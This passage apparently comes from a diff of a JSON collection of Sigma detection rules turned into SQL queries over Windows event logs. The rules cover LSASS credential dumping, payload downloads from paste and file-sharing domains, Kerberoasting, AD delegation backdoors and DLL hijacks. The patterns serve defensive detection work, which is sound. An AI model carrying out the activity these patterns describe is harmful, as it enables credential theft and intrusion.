'%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_winsat.yml" + "filename": "win_appxdeployment_server_susp_domains.yml" }, { - "title": "Suspicious Word Cab File Write CVE-2021-40444", - "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", - "status": "experimental", - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", - "author": "Florian Roth (Nextron Systems), Sittikorn S", + "title": "HybridConnectionManager Service Running", + "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid 
Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" ], - "filename": "file_event_win_winword_cve_2021_40444.yml" + "filename": "win_hybridconnectionmgr_svc_running.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", - "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", - "status": "test", - "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "title": "Loading Diagcab Package From Remote Path", + "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "status": "experimental", + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.resource_development", - "attack.t1587", - "cve.2021.1675" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate package hosted on a known and authorized remote location" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 
'%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_1675_printspooler.yml" + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" }, { - "title": "Windows Shell File Write to Suspicious Folder", - "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", - "status": "experimental", - "description": "Detects a Windows executable that writes files to suspicious folders", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Outbound Kerberos Connection - Security", + "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", + "tags": [ + "attack.lateral_movement", + "attack.t1558.003" + ], "falsepositives": [ - "Unknown" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\') AND (TargetFilename 
LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_shell_write_susp_directory.yml" + "filename": "win_security_susp_outbound_kerberos_connection.yml" }, { - "title": "Powerup Write Hijack DLL", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", - "status": "test", - "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", - "author": "Subhash Popuri (@pbssubhash)", + "title": "Generic Password Dumper Activity on LSASS", + "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "status": "experimental", + "description": "Detects process handle on LSASS process with certain access mask", + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.001" + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" ], "falsepositives": [ - "Any powershell script that creates bat files" + "Legitimate software 
accessing LSASS process for legitimate reason; update the whitelist with it" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE 
'%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_powerup_dllhijacking.yml" + "filename": "win_security_susp_lsass_dump_generic.yml" }, { - "title": "Created Files by Office Applications", - "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", - "status": "experimental", - "description": "This rule will monitor executable and script file creation by office applications. 
Please add more file extensions or magic bytes to the logic of your choice.", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "title": "Weak Encryption Enabled and Kerberoast", + "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", + "status": "test", + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "author": "@neu5ron", "tags": [ - "attack.t1204.002", - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR 
NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" ], - "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" + "filename": 
"win_security_alert_enable_weak_encryption.yml" }, { - "title": "Suspicious File Creation In Uncommon AppData Folder", - "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", - "status": "experimental", - "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Enabled User Right in AD to Control User Objects", + "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "status": "test", + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" ], - "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" + "filename": "win_security_alert_active_directory_user_control.yml" }, { - "title": "Potential Remote Credential Dumping Activity", - "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "status": "experimental", - "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", - "author": "SecurityAura", + "title": "Password Dumper Activity on LSASS", + "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + "status": "test", + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "author": "sigma", "tags": [ "attack.credential_access", - "attack.t1003" + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" ], - "filename": "file_event_win_remote_cred_dump.yml" + "filename": "win_security_susp_lsass_dump.yml" }, { - "title": "Suspicious DotNET CLR Usage Log Artifact", - "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", - "status": "experimental", - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). 
These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", - "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", + "title": "ETW Logging Disabled In .NET Processes - Registry", + "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = 
'0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" ], - "filename": "file_event_win_net_cli_artefact.yml" + "filename": "win_security_dot_net_etw_tamper.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack", - "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "title": "SMB Create Remote File Admin Share", + "id": "b210394c-ba12-4f89-9117-44a2464b9511", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" + "filename": "win_security_smb_file_creation_admin_shares.yml" }, { - "title": "Suspicious Desktopimgdownldr Target File", - "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "title": "Active Directory User Backdoors", + "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a 
suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.t1105" + "attack.t1098", + "attack.persistence" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" ], - "filename": "file_event_win_susp_desktopimgdownldr_file.yml" + "filename": "win_security_alert_ad_user_backdoors.yml" }, { - "title": "PowerShell Profile Modification", - "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", + "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", + "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "status": "test", - "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "HieuTT35, Nasreddine Bencherchali", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL 
Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "System administrator creating Powershell profile manually" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_powershell_profile.yml" + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Typical HiveNightmare SAM File Export", - "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", - "status": "test", - "description": "Detects files written by the different tools that exploit HiveNightmare", - "author": "Florian Roth (Nextron Systems)", + "title": "PetitPotam Suspicious Kerberos TGT Request", + "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "status": "experimental", + 